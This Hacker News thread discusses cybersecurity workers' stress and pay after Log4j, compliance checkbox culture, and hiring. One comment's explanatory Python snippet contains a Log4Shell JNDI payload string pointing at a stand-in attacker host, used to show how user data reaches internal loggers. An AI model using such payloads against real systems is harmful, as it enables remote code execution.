Hacker News
Ask HN: Are Cybersecurity Workers Ok?
106 points by Victerius on Dec 14, 2021 | 136 comments
In the last 12 months we have seen the SolarWinds hack, the Microsoft Exchange Server data breach, and since Friday, Log4j. I'm reading an article on CNN about the US government's response to Log4j.

"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet. Cybersecurity executives across government and industry are working around the clock on the issue."

""For most of the information technology world, there was no weekend," Rick Holland, chief information security officer at cybersecurity firm Digital Shadows, told CNN. "It was just another long set of days.""

The sysadmin subreddit is also full of professionals talking about the problem.

With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?



The past few years have made me sour on how many organizations run cybersecurity in general. The industry is full of individuals who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude. They struggle with basic fundamentals like inventory and patch management. It is an industry that is hard to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want insight into the reality of how the government operates, just look at the GAO reports; they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation


Add to that the general lack of education around cyber security: hardly any mainstream CS course teaches cyber security as a mandatory course. We have CS PhD engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about the security of their code and systems just like they care about performance, reliability, maintainability, etc.

The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for the log4j vuln if it's not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user-controlled data.
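To make the point concrete, here's a minimal sketch (with hypothetical service names, not taken from the actual incident) of how attacker-controlled text can reach an internal service's logger even when that service never talks to the internet:

```python
# Hypothetical two-tier setup: an internet-facing edge service forwards a
# request header to an internal service, which logs it. The internal
# service is "not internet facing", yet user-controlled data still reaches
# its logger -- which is exactly the condition Log4Shell needed.

def edge_service(request_headers):
    # Internet-facing tier: passes the User-Agent along unmodified.
    return internal_service(user_agent=request_headers.get("User-Agent", ""))

def internal_service(user_agent):
    # Internal tier: builds a log line containing the forwarded header.
    # With a vulnerable log4j, a ${jndi:...} token here triggers a lookup.
    log_line = f"processing request from agent: {user_agent}"
    return log_line

payload = "${jndi:ldap://attacker.example/a}"
line = edge_service({"User-Agent": payload})
print(payload in line)  # → True: the payload lands in the internal log line
```

The point is that "internet facing" describes the service, not the data; the data crosses the boundary anyway.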

Look at the recent Azure vulns. I am pretty sure their internal security team knew about these, and after some back and forth some exec signed off on an exception. They would rather be shipping features than fixing the mess they created. Most infosec peeps have trouble getting teams to prioritize security stuff, and some of the blame falls on infosec teams too for making everything sound like an end-of-the-world scenario. But did Azure lose a single customer, did the stock price go down, was there a loss of revenue? Nope. So what's the point of investing so much in security if truly the only harm was some loss of reputation?

Even most security execs I have had a chance to interact with don't understand security topics properly; sure, they can throw some jargon around in all-hands meetings and such. Unless they come from a security background, these execs often confuse security with compliance, and instead of investing in defense-in-depth techniques they look for check-boxes against security controls.


>Add to that the general lack of education around cyber security, hardly any mainstream CS course teaches cyber security as a mandatory course

Paradoxically, when someone has completed a pure (or at least focused) cybersec program (a few 3-4 year programs are taught by reputable institutions near me), and a Sec+ or equivalent, all of the old guard shout about needing years of experience (decades preferably) before you should be allowed to even think about security.

It only takes a few days in r/cybersecurity or r/securitycareeradvice to see these people in action, yelling at kids coming out of a 4-year university course focused on cybersec to "pay their dues" and work a call-center/help-desk for a few years resetting people's passwords before being allowed the honor of applying to an "entry-level" security position.

If a 4 year program cannot prepare you for an entry-level position, either the program is broken or the hiring expectations are broken.

Just in this thread someone was saying they would require 10 years of system administration AND 5 years of security experience before considering hiring them. In the same amount of time you can become a doctor or lawyer, and be operating on people or have established your own law firm.


I'm tempted to rather rudely suggest that the people who managed to get a job on a helpdesk without any qualifications and then worked their way up to an "old-school" bureaucratic security manager position might feel threatened by graduates with newfangled ideas about DevSecOps.


Exactly what counts as an entry level security position? Manually analyzing alerts or something?


Really, any cybersec role but with "Jr." in front; lightened duties and lightened responsibility, under the management of someone with more experience, doing whichever duties their manager thinks they can handle.

- Compliance auditing (PCI, ISO, WebTrust, etc.).

- Software auditing.

- Delivering basic consumer-level security awareness training.

- Tier 1/2 SOC and NOC duties.

- Member of an incident response team.

- Member of a penetration testing team.

- Policy development, deployment and management.

- Jr. Researcher for XYZ (PKI, cryptography, authentication systems, malware, etc.)


> Add to that the general lack of education around cyber security

Part of the problem is the for-profit schools and bootcamps cranking out 'cyber security' graduates. They know the least out of all the people I interview. How can you pretend to know anything about cybersecurity when you don't actually know anything about programming or networking?

The classes cover buzzwords like vishing/phishing/smishing, you run Kali Linux and 'hack' something, and then you get your certificate.


>Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for the log4j vuln if it's not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

I got a lot of good mileage out of explaining the Equifax Struts vulnerability, which allowed attackers to move freely through Equifax internally once outer security was breached because internal security controls, especially around patching, were so weak. Might be worth trying if you encounter the same situation again.


> Most infosec peeps have trouble getting teams to prioritize security stuff, and some of the blame falls on infosec teams too for making everything sound like an end-of-the-world scenario.

So much this. I once had a security review failed because an API would respond with HTTP 422 on invalid input. When I asked why that was a security issue I got shut down with “defense in depth”. After a longer discussion, it turned out the problem was that 422 was not part of “the original HTTP spec” but rather some WebDAV extension.
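For what it's worth, 422 is a registered status code from the WebDAV spec (RFC 4918), and even Python's standard library ships with it (a small aside to illustrate how mainstream the code is, not part of the original exchange):

```python
from http import HTTPStatus

# 422 Unprocessable Entity comes from WebDAV (RFC 4918). It is a
# registered, IANA-listed HTTP status code, so the claim that it is
# "not part of the HTTP spec" in any meaningful sense doesn't hold up:
# the Python stdlib enum knows about it out of the box.
status = HTTPStatus(422)
print(status.name)    # the enum member name for 422
print(status.phrase)  # the registered reason phrase
```

Rejecting invalid input with a 4xx code is ordinary API behavior, not an attack surface.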


> Add to that the general lack of education around cyber security: hardly any mainstream CS course teaches cyber security as a mandatory course. We have CS PhD engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about the security of their code and systems just like they care about performance, reliability, maintainability, etc.

Here's the issue: cyber security is seen as a cost center. As long as it's viewed as a cost center, good CS programs won't care for it. Which means right now it's relegated to certificates and extension schools... we all know what that means.

If companies/governments start caring for cybersecurity, ie, create a prestigious and visible organization that directly reports to the White House for instance, then you'll see the good CS degrees adding more of it to their curriculum.

> The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for the log4j vuln if it's not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.

I remember being in a room like that. At one point several people were arguing and the lead engineer just tapped his brass rat on the table to get everyone's attention. I remember the PM was furious but what was he going to do? They don't sell those at the gift shop...

Truth is, PM orgs need to exist in a parallel way to engineering orgs. PMs managing engineers is a red flag, and a true tech company should ideally have engineers all the way to the CEO position. So if there's security work and engineering deems it necessary, it's done no matter what some non-technical employee thinks.

Engineers could honestly take a page from MDs here. Opinions of non-MDs are basically regarded as irrelevant...


Have you ever worked with someone in information security, only to find out they're checking off boxes but don't know what they're doing? Has it been scanned by this piece of software (which produces 832 false positives) and provided with a remediation plan? Has everyone taken the online cyber security training? Do you have a documented architecture? Are you using the approved software versions (only they didn't get the memo that we've moved on from Java 1.8)?

I once had to argue back and forth with someone (circa 2008) over whether JavaScript meant "mobile code" in the sense of their checklist. I had to explain what JavaScript was and how it worked, but they were still more than willing to tell me I had to remove it from the app I was working on, which would have rendered my app and all the other apps for that client much less functional.


> JavaScript did not mean "mobile code" in the sense of their checklist

What the hell does that even mean?


What they were referring to were ActiveX controls, Java applets, dynamically downloaded JAR files like on Sun's Java browser plugin, etc. Like rollerblading, it was the unfortunate trend of a bygone era. And yes, it was a ridiculous term, and just more evidence that "cyber security" is an organizational fig-leaf.


I think the general mindset is, if something can be used for exploitation, then for the sake of safety we should block it entirely.

Of course the mainstream stuff is tolerated, but anything outside of that would need a long list of approvals.


This. The only person I would trust is someone who was a sysadmin for at least 10 years and then decided to specialize in security for another 5. So you are looking at a minimum of 15 years of experience to be decent. Without deep sysadmin skills, I am at a loss as to what they would contribute. You are going to update our firewall without understanding what CIDR notation is? You are going to create a VPC for the dev environment without knowing what a subnet mask is? You are going to monitor security across thousands of VMs with no cloud background? Security is a deeply specialized field. Not only that, you need to be a bit of a bully: you are always fighting PMs for more time to vet things and patch things, all while being a cost center.
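For readers wondering what's actually at stake with CIDR notation and subnet masks here, Python's stdlib `ipaddress` module makes the relationship concrete (a small illustration, not from the comment):

```python
import ipaddress

# A /24 in CIDR notation is shorthand for a 255.255.255.0 subnet mask:
# 24 leading one-bits in the mask, leaving 8 host bits (256 addresses).
net = ipaddress.ip_network("10.0.1.0/24")
print(net.netmask)        # 255.255.255.0
print(net.num_addresses)  # 256

# Misjudging the prefix length is the classic firewall/VPC mistake:
# a /16 "for the dev environment" spans 65536 addresses, not 256.
big = ipaddress.ip_network("10.0.0.0/16")
print(ipaddress.ip_address("10.0.200.7") in big)  # True
print(ipaddress.ip_address("10.0.200.7") in net)  # False
```

Someone writing firewall or VPC rules without being able to do this arithmetic is exactly the failure mode the commenter is describing.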

Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.


If it takes 15 years to get someone only to a decent level, the industry needs to start laying out plans for effective training and credentialing. The solution here is not more years required, but more effective teaching. Learning on the job is practical but not efficient; one example being that you spend time dealing with org issues rather than learning something technical.

I don't agree that it takes 15 years though. I think you're setting the standards way too high for no good reason, especially for "decent".


> effective training and credentialing

By the time you're done creating the perfect "Information Security Certification" test everything will have changed. Even the most nebulous of security certifications (CISSP; which has a super generic test that doesn't cover much in the way of "practical security") still requires 5 years of experience before you can even take it.

It's just as bad as the JavaScript ecosystem. Maybe even worse, actually.

Information security is an ultra fast moving target. The only way for companies to effectively manage it is to hire people who constantly fuck around (with technology) and are always learning (the limits of) new things. It's incredibly hard to hire (and retain) people like that.

The "safest bet" for someone who really wants to be a great InfoSec professional is to get really good at Linux systems administration then start learning how to break into things. Because once you've broken into a system you need to know how to create/execute payloads. Otherwise you're going to get stuck on the first step every single time: Finding the vulnerability. You need to be able to exploit one host and then use that one to break into another system (pivot).

Learning Windows systems administration isn't as useful IMHO because there are fewer systems and they're all the same for the most part (monoculture). You can pick up everything you need to know about exploiting Windows in a short time and then exploit it limitlessly (haha) later. Whereas Linux sysadmin skills are applicable to a very wide array of systems, from embedded stuff all the way to supercomputers.

Also, if you're going to get into hardware hacking or making physical devices that help you test the security of things Windows skills are basically useless. Nobody actually loads Windows 10/11 on to something like a Raspberry Pi in order to place a physical back door somewhere (or interface with SCADA systems, air conditioners, etc).


>By the time you're done creating the perfect "Information Security Certification" test everything will have changed.

>The only way for companies to effectively manage it is to hire people who constantly fuck around (with technology) and are always learning (the limits of) new things

Then make the curriculum about fucking around with technology, taught by people who fuck around with technology for a living. Then you get a nice certificate that says you fucked around with technology for a bit and shows that you're capable of fucking around with more technology.

You're right about all the previous certs, but the solution is simple: make the curriculum match how people actually learn in the industry.

>The "safest bet" for someone who really wants to be a great InfoSec professional is to get really good at Linux systems administration

Don't get really good: get pretty good then go learn programming. You talk about jumping between embedded and supercomputers later, but programming/AppSec is more important and way more useful (esp. if you don't already know how to program)

>Learning Windows systems administration isn't as useful IMHO because there's fewer systems

Oh no mate, AD is everywhere and those skills are immensely useful to a large amount of companies. Offensive Security even changed their OSCP exam to have an AD target set.


You are utterly missing a business dynamic here in America and elsewhere. Companies that originate in, or have strong ties to, established finance literally push skill down the pay stack, not up. What does that mean? If a certain engineering skill is rare, it will cost more money to pay someone, and be harder to find. Therefore, commoditize and automate where you can, via cloud accounts and "best practices"; outsource to another company where you can; and promote internally for ruthless cost-cutting, firing, and aggressive contract manipulations. This is not extreme; this is normal and daily, and has been for decades.

The imaginary skilled professional you are describing clearly originates in the mind of an engineering worker: a person gains skill through experience and is promoted. This is the opposite of what management builds over time. Management specifically and exactly destroys this career path because it costs them more money. As long as you can commoditize and outsource, you drive costs down, not up.

Meanwhile, it is "eternal September" in the job world, with streams of 20-somethings lining up to get into the markets. Add lower cost engineers, for example in Eastern Europe, South East Asia and South Asia. Rinse and repeat.


Thank you for this. This is the first post I've read on this thread that acknowledges the reality of what it's like for career-minded infosec folks.

I'm a 15-year infosec vet. I'm not nearly as technical as some of the HN crowd would like infosec guys to be, in large part because high technical skill is not something employers generally want and are willing to pay for. If you want to maximize pay, the best path is to learn just enough to be regarded as competent, then move into management, sales, or PM work. There's barely room for the highly-skilled, highly-technical cyber guy in most large companies, let alone SMBs. Most companies chop this ideal infosec role into multiple parts to minimize cost and risk, just as you describe.


Agreed. And it's actually not an American phenomenon but a global one (as long as the company is listed on the US stock market). The model is basically to remove IT functions from branches and concentrate all IT power (think DBA/DevOps/etc.) at HQ so that you only need to maintain one single big IT department. In the middle of this, HQ will also try to replace custom solutions with one single solution that works for all branches/departments. The branches still need to maintain a small IT team, but essentially they are just configuration pushers.

Then it outsources to Eastern Europe.


You could say the same about security folks without software engineering experience, too.

When I was working in infosec consulting, by far the best colleagues were those who had software engineering experience and could empathise with developers at the client in order to understand how systems would be built, where corners might be cut, which areas might be more ropey than others etc (and then use that understanding to help inform their thinking from an attacker's perspective).

You could tell at interview too - the folks with a Computer Science background and a side interest in security were much, much better than those who took the dedicated-cyber-security degree/masters route.

You absolutely need a real generalist for security. With that said, I don't think it's unreasonable to expect a developer to know about CIDR notation, networking and cloud systems though we're perhaps straying into more DevOps-y style roles.


This has been exactly my path. Can write data security guidelines and also read PCAP files fluently. However, you will not find very many of me.

Sysadmin/ops has too many offramps that drain talent before year 10. If you can integrate software/systems well, manage projects, or do advanced troubleshooting, you will likely be pulled out of ops. Conversely, there is an ocean of security certifications being issued to people who have very little operational/technical experience.

Data security in practice is being reduced to a policy and procedure checklist. It is frustrating for an engineering group to receive non-specific or contradictory policy guidelines written by non-technical people, but I have yet to see that change hiring or decision making. Businesses want someone who will agree to check the box. If that someone doesn't know all the details, that makes checking the box easier.

The future of cybersecurity is not the skilled coordinator/PM but instead yet another non-technical management arm handing down mandates that are blind to technical reality. There isn't another option. There aren't enough people to fulfill demand, and the compensation for cybersecurity positions is often less than for a senior infrastructure role. How many sysadmins really understand networking, programming, databases, etc., while also having the people skills not to alienate both management and highly technical development and operations teams? We will never have enough people at the intersection of that many skills.


I think the problem is sysadmin is NOT something you can learn using a personal account. Same for most DevOps things too, you simply don't have 1) the $$, and 2) the many services that you can play with. You HAVE to join a large corporation to learn the real stuff.

Plus nowadays more and more companies are going on cloud, so there are fewer sysadmins jobs anyway.

I'm someone who really wants an admin job, be it DBA or sysadmin. Problem is, I first joined as a business analyst, and now I'm a DWH developer/data engineer hybrid; every step towards an admin-ish job is way too long and difficult for me :/


It's amazing that we can train someone to be a doctor and allow them to operate on your heart, brain, etc. within less time than you'd allow someone to touch your precious environment.

This points to two issues: education needs to be addressed with more input from industry, and expectations for hiring need to be realistic. 10 years before you're able to work on something security related is not realistic, nor is it sustainable.


I would not trust a surgeon to operate on me unless they have over 65 years of experience. I want them to have operated on patients since 'Nam. You went to a state medical school? Pfft. Go kill some other patient than me.

In all seriousness, your point raises the question of where the responsibility for this immensely difficult task (securing networks) falls. If we could spread out the "required" 15 years of experience across each of the developers, would that have the same effect? Building software with security baked in would reduce the need for so much work after the fact.


General security awareness training in CS programs (not the 'don't get phished' type of security awareness) would certainly go a long way, in my opinion. Security being taught as a fundamental necessity of programming would, down the road, lessen the load everywhere else.

But there is also a fundamental disconnect between what schools are teaching and what industry is hiring for. The answer right now is "Go to school for cybersec, get your certs, then work for X years as a low-level help desk agent or call-center phone jockey".

Industry needs to tell educational institutions what candidates get from being a password-resetter that isn't taught in school, and work with those institutions to get those skills into the curriculum.

I have a lot more to say on the topic of cybersecurity and hiring, but I'm getting into rant territory.

Edit to add: You mentioned 'spreading out the 15 years of required experience'. I firmly do not believe it takes anywhere near 15 years of experience to become competent at cybersec.


Amusingly I would never hire a sysadmin to do security. Sysadmins were taught how to administer and apply this knowledge. With security the field is constantly shifting, you don’t want someone who knows how to apply you want someone with a deep understanding of the underlying principles able to design and explain new solutions. It’s really an engineer job.


Amusingly, this is a recent development.

Once upon a time there were programmers.

Then there were systems programmers and application programmers. Systems programmers wrote operating systems and utilities for them. App programmers wrote apps. There was a lot of crossover.

Then there were operators, systems programmers and application programmers. Operator was a junior position who did physical things (mount tapes, plug in cables) and ran commands to do things on the systems. They usually moved up to being…

Systems administrators, who did some programming in service to the systems, but not too much. The more senior a sysadmin was, the more time they spent programming and the less time they spent doing physical things… unless they wanted to do that.

Sysadmins started to specialize. People who configured switches and routers and talked to telephone companies became “network engineers”. People who spent time working on firewalls and security policies and thinking about that became “security engineers”. Junior people who read scripts to end users became the helpdesk. And so forth.

Then we noticed that a bunch of people were doing things manually when they should be automated. This was especially bad in places where there were no senior sysadmins or systems programmers. But we did have the internet, and senior sysadmins got together and started writing tools to make their lives easier: infrastructure automation.

Remind me, which kind of engineer?


That's very cute but that doesn't mirror my experience with reality at all. Sysadmins are people who are hired for specific knowledge of maintaining and managing the infrastructure. They are expected to have operational knowledge, are not asked to design novel solutions to unforeseen problems, and are paid accordingly. Most sysadmins I have worked with become unpleasant, not curious, when they reach the limits of their expertise. Good sysadmins tend to leave the field for better-paid positions in engineering or get hired as SREs by large companies, which is akin to moving to an engineering position because SREs work like engineers.

The idea that senior sysadmins are behind the push towards automation is amusing. The biggest shift in the field in the past two decades came from Google when they decided to solve the tension between developers and sysadmins by more or less firing their sysadmins and hiring engineers to do the job instead.


> The idea that senior sysadmins are behind the push towards automation is amusing.

Many true things are amusing, including this one. I think you are operating with a remarkably narrow and historically ill-informed definition of "sysadmin", and your prophecies are self-fulfilling. If you have a tension between developers and sysadmins, it's a cultural problem.


Dang, on second thought I actually kinda agree with you on the number of years. Humans are strange animals that HAVE to learn from mistakes, and their OWN mistakes. Mistakes of other people rarely ring a bell loud enough.

But I do believe that for an entry level you don't need 15 years. Maybe 5 years of sysadmin or devops should be good enough.


Most jobs in "cybersecurity" are essentially just around for CYA purposes and not actually for improving security in any meaningful sense. Indeed, deployment of "security measures" for managerial CYA purposes result in things actively detrimental to security, like widely deployed, invasive snakeoil and many other things.


It's not just the jobs - it's the WHOLE fucking "software security" industry from the top down (I worked in it for 5 years - I refuse to touch it with a 20ft pole now).

The entire industry plays a game of:

- Create a checklist (or use an existing checklist - ex: FIPS)

- Check off all the boxes on the checklist (any way they can - however they can, with complete and utter disregard for the spirit of the checklist)

- Confirm with legal that checklist is complete

- Advertise that they are "secure" to customers who happen to care (not many do, honestly) and present them with the required completed checklists

- Get hacked LEFT AND RIGHT because the whole fucking game has nothing to do with security, and everything to do with liability.

- When they're hacked, whip out the checklist again and go "couldn't have been our fault! we followed the checklist."

Repeat.

----

Now - software security is hard. Unfathomably hard to most people (as in, they literally don't understand). People STILL fail to realize that software security is not like building a bridge - I see it even here on HN, where folks spout off bullshit comparisons to things like restaurant health/safety inspections or architectural reviews.

The difference is that the bridge is not constantly being assaulted by an intelligent, evolving, malicious, human force. The software usually is.

And the security team can't just win one battle - they have to win every battle. Whether that's old systems, or a tired employee clicking an email link.

So I think you're basically between a rock and a hard place as an honest security worker. The job is literally impossible - so the folks who make money are the ones who compromise fastest and check off the most checklists (again - spirit of the checklist be damned).

I think the ballooning insurance payments (and the obvious eventual halt to offering cybersecurity insurance) will eventually bring the whole house of cards down, but we're still a few years out from that.


Physical-world analogies are appealing and easy to visualize, but they work so poorly that I wish we stopped using them altogether for IT security. A bridge under attack is a bad analogy too. One cannot possibly build a bridge that is impossible to destroy for an attacker with 100x the bridge-building budget. But in IT, at least in theory, it is possible to build such a system. If you make no mistakes. But the more complex the system, the less likely it is that no stupid mistakes were made.


Those comparisons are a pet peeve of mine. What kind of bridge can you automatically tear down and rebuild from a blueprint? Or reliably build on top of layers of technology you barely understand? That does create moral hazard. But it can also be a solution.


In light of this, how would you propose a developer or a would-be developer to really understand software security? I have the feeling that unless one is well versed in sys-prog concepts it's kinda just a checklist factory. I know I need to do A, B and C but I don't know in depth why.


That's because having good security doesn't make you more money.


Now that insurance companies are aware of all those infamous exploitation stories that make headlines...

Well, maybe more checklists and consultants.


"A penny saved is a penny earned."

It may not make more revenue but poor security certainly affects profits.


As long as poor security is cheaper than effective security, nothing changes. Equifax, Solarwinds, and Colonial Pipeline are all still in business.


This. We really need more competition to help.


Competition won't help - it is impossible for an outsider to accurately measure a company's security practices and pick a company based on that.

What we need is regulation regarding putting personal data at risk to provide a financial incentive for companies to take security seriously.


That is the last thing business wants. The credit card brands developed PCI to avoid regulation. But in most circumstances, there is no 800 pound gorilla to enforce security standards.

If you do an in-depth read of the PCI security standards, you’ll see that the standards are about protecting the card brands, not you.


PCI is a very bad example because when it comes to card fraud the liability is on the merchant, bank or card networks. So in that sense it's actually normal that PCI focuses on protecting card brands and not you because you are already protected by them and they're just trying to recoup the costs.


You can't compete against free.

Risk is free.

A risk-aware competitor faces a higher cost function and a market which won't support it.

What we need is regulation, and direct liability of corporations, stockholders, creditors, and executives.


Change doesn't only occur with death.


The funny thing about this adage is that any profitable endeavor will have higher revenue gains than a penny saved, so as stated it fails to convince.

"A stitch in time saves nine" is probably more relevant to security.


Accountants have made loss-risk-based evaluations for a few centuries now.


Neither does GDPR compliance, but here in the EU I know companies that are really nervous about being fined, while at the same time doing their best to comply.

Fines would therefore be the obvious solution to the lack of cybersecurity. Network breach / data leak due to not patching software x days after vuln disclosure? Here's your fine!


Unfortunately, most of the alphabet-soup compliance programs have perverse incentives - they encourage ticking check-boxes while doing nothing to improve security as such.

I believe the real problem is that effective security is hard, and most would rather pretend than actually invest in doing it.


I had our sec team try to blanket-ban base64 strings on our WAF in response to log4shell. I'm talking body, URL, everything.

The reasoning was that we probably don't use base64. I was amazed.


I love that if you brought up that you can't tell the difference between base64 encoding in URLs and other random alphanumeric strings, your cyber team would then get even more wide-eyed about "exfiltration attacks".


Please ask them to write a regex that filters out those naughty base64 strings! Yes, "12345678" is a valid base64 string and so is "clueless".
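To drive the point home, here's a quick sketch (the regex is illustrative, a naive approximation of such a WAF rule, not anything a real WAF ships) showing that syntactically valid base64 includes ordinary words, numeric IDs, and URL path fragments:

```python
import re

# A naive WAF-style "base64 detector": runs of the base64 alphabet
# whose length is a multiple of four, with optional '=' padding.
BASE64_RE = re.compile(r'[A-Za-z0-9+/]+={0,2}')

def looks_like_base64(s):
    """True if s is syntactically valid base64 -- which proves nothing."""
    return len(s) % 4 == 0 and BASE64_RE.fullmatch(s) is not None

# "aGVsbG8=" really is base64 (it decodes to "hello"), but the innocent
# strings below are flagged just the same.
for candidate in ["aGVsbG8=", "12345678", "clueless", "user/profile"]:
    print(candidate, looks_like_base64(candidate))
```

Every one of those prints True, so blocking on this match would reject plain words, numeric IDs, and path fragments alike.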


> A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude.

Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.

Of course, if your company is private and the shareholders are decent enough people to make sure the board are doing things properly, this can work. With public companies I don't see how it is remotely feasible?

We have to legislate to compel companies to do this and expand the definition of negligence, which itself is quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box checking behaviour on their watch. It is the only way.


You really have to have a zen mindset and refuse to let these outside issues control you. There is infinite bad shit out there and you can work for years and barely make a dent in it. That is just how it is.

Personally, I am helped by working in client services. It constantly amazes me the kind of risk a business is willing to accept for barely anything in return, and if I actually had a personal stake in what I am seeing at clients I think I would be much more stressed.

Also, the issue is not just 'are security professionals ok'. Good security starts with good operations, and good operations is a rarity. We need devs to ship products that can run with least privileges and have secure defaults. We need operators to have a good understanding of their own environment and to design things on purpose rather than just improvising. We need security people that can offer more guidance than just printing out a nessus scan. We need business analysts who are pragmatic with concessions and who are willing to spend the resources needed to do things right the first time.


I think a big issue, from what people are saying, is that it has somehow become an infosec employee's fault that the system is not secure. This is about managing boundaries, and it happens in many disciplines. My wife struggles as a solicitor with unending demands on her time and the guilt-trips of "this agreement needs to be done by Friday", and for some reason people get upset if the response is "you should have given me four weeks' notice".

The landscape is desperate with hundreds of apps, servers, networks, employees etc. in most companies. The tooling is either difficult or expensive or both - how many people allow outgoing firewall traffic by default because it is too complicated to whitelist everything that needs to go out? Even with the best will in the world, basic things like Windows updates, SSL cert updates (no we can't all use Lets Encrypt), Linux updates can be a full-time role.

But to be fair, our industry is still quite immature. We do not have the regulatory backup across the globe to assure all products are developed securely etc. We use open-source libraries with barely any checks (and what would we check anyway?) and IT is mostly intangible so how do we even know what we are doing anyway?

This sounds doom and gloom but I think every industry has a Wild West stage that teaches people what is and isn't important and allows industries and products to mature eventually to something that is sustainable.


> "somehow it has become an infosec's employee's fault that the system is not secure."

Yet, it still isn't; elsewhere someone mentioned doctors, and by comparison a doctor must pass nationally recognised exams, afterwards take personal responsibility for what they do every day, hold malpractice insurance, and risk being struck off medical registers and forbidden from practising again for e.g. incompetence, unethical behaviour, or malpractice. What are the equivalents of these in cybersecurity?

Customers or users whose data is stolen in a hack, employees who lost their jobs to a ransomware attack shutting down a company - what equivalent of "medical malpractice" lawsuits can they bring against the infosec team that was employed and paid to keep them safe? Can the harmed people even determine whether the infosec team acted unethically or incompetently vs. sensibly? What reassurance can they take when the infosec employee says "I told them I shouldn't be opening this connection and they made me, so it's not my fault"? Imagine a surgeon performing a surgery they disagree with on a patient because non-medically-qualified hospital management told them to. What happens to the security teams who incompetently fail to protect against those harms and carry on to their next job without any obligation to disclose their association? What board of reasonably trusted people is overseeing them, holding them to account, and what register can they be struck off? It's "mistakes were made" all the way up to the CEO.

I don't agree that it's the infosec employee's fault. (Insert popular civil engineering/bridge design comparison here, and the need for a competent qualified senior engineer to sign their name against a design which they can personally be held responsible for).


No we’re not. I will tell you this year I’ve dealt with more security incidents than I have in my entire career combined.

My organization takes security seriously, but at the end of the day we serve customers who don't. That's been the bulk of our issues this year.

log4shell has just been the icing on the cake.


Are you at least getting paid better?


Nope, not being paid better here despite the 'need for talent', record profits and inflation. "Lucky" to get a 2.5% raise. YES yes I know the rhetoric, " just find a better job". No, not doing better; this year has seen more incidents for my team than ever before. Still operating on a shoestring budget, lacking in tools and coverage, and more and more piled on the plate. Things are not okay.


> YES yes I know the rhetoric, " just find a better job".

That's the rhetoric from young people with no strings attached. People who are older, often with families, always with local connections and long-term relationships, have far more variables when it comes to making that sort of decision.

Pay and working environment (unless either are truly terrible) are rarely even at the top when it comes to enumerating the factors that go into deciding to stay or uproot your entire life and start again elsewhere. If you have a spouse with a good job in a niche area, doubly difficult.

EDIT: Unless you live in an area where you have many nearby options, of course. But those sorts of areas are sometimes harder to move around because the competition for 'good' employers is much fiercer.


FWIW, 2021 has been probably the best year ever to change the company in IT:

- Remote work is now standard, you don't have to relocate

- US companies and well-funded startups opening up outside of US and hiring remote devs (though this is not always officially advertised, but for senior-enough people it's almost always negotiable)

- Tons of reports of people getting 30/50/100% raises (by changing jobs, or counter-offers)

Source: first-hand on all above (I'm frontend dev though, not in security)


I have a family, local connections, etc. In the past year I've changed jobs twice, for a 45% raise in the last 12 months. But because all three jobs over this period have been remote, I haven't had to disrupt my family at all.

Since the last two companies have been headquartered in different cities, this wouldn't have been possible before COVID.

The silver lining on this damned pandemic has been a lot more options for people, like software developers, in the privileged position of being in demand with work that can be done remotely.


And factor in ageism. I'm about a decade away from retirement, but I definitely don't want to be job hopping. The idea of interviewing at my age is horrifying.


I would suspect not, unless they left and went to another company.


As a cybersecurity person, what do you do about log4j?

1. Try to identify if you are vulnerable

2. Inform people in your company

3. Contact vendors of vulnerable products and ask for a patch

4. Have sysadmins install said patch
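Step 1 is often the hardest part. As a rough illustration (the version threshold is illustrative - check the current Apache advisory - and real sweeps also have to look inside fat jars and container images, not just at files on disk), identification can start as a filesystem scan:

```python
import os
import re

# Illustrative threshold: treat anything below this as vulnerable.
FIXED = (2, 17, 0)
JAR_RE = re.compile(r'log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$')

def find_vulnerable_jars(root):
    """Walk a directory tree and list log4j-core jars older than FIXED."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            m = JAR_RE.match(name)
            if m and tuple(map(int, m.groups())) < FIXED:
                hits.append(os.path.join(dirpath, name))
    return hits
```

Even a crude sweep like this across a server fleet gives you something concrete to hand to the sysadmins in step 4.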

Cybersecurity people don't do anything. You're not patching. You're not finding the new flaws. You're reactively trying to solve problems when they make the news.


This reductionist logic can be applied to anything (i.e. is meaningless).

This is actually a bit of a fun exercise!

What do programmers even do?

1. Client tells them what they want solved.

2. Stack overflow has code examples for these problems.

3. IDE tells you what will compile, what wont, even highlights stuff for you (programmer just copy/pastes).

4. Compiler makes the program, and warns you if it doesn't work. If it doesn't work, go back to step 2.

Programmers don't do anything.

See how dumb that sounds when you skip over a bunch of the minutiae? Or when only looking at a single event? Or generalize to the point of nothingness?


Hell yeah I’m doing fuckin great. I make almost double what I did two years ago and I’m receiving 20+ job solicitations per week. I believe the ever escalating rate of hacks has dramatically improved the job market from the employees perspective.

Cybersecurity is SUPER broad though and there’s a range of many different roles. I’m a bit surprised all the folks here saying they’re not okay. Best of luck to them and maybe it’s time for a role swap.

I used to work in a SOC so I get it and probably would be struggling if I was still there.


What are your working hours like?

Also somewhat related - what's the best path for a senior software developer to enter that space? Is the pay the same?


I pretty much work whenever I like, except for the 1-2 daily meetings I have during normal business hours.

> what's the best path for a senior software developer to enter that space? Is the pay the same?

Well it depends what you’d wanna do. I work in application security which imo is the easiest transition into security for a senior dev.

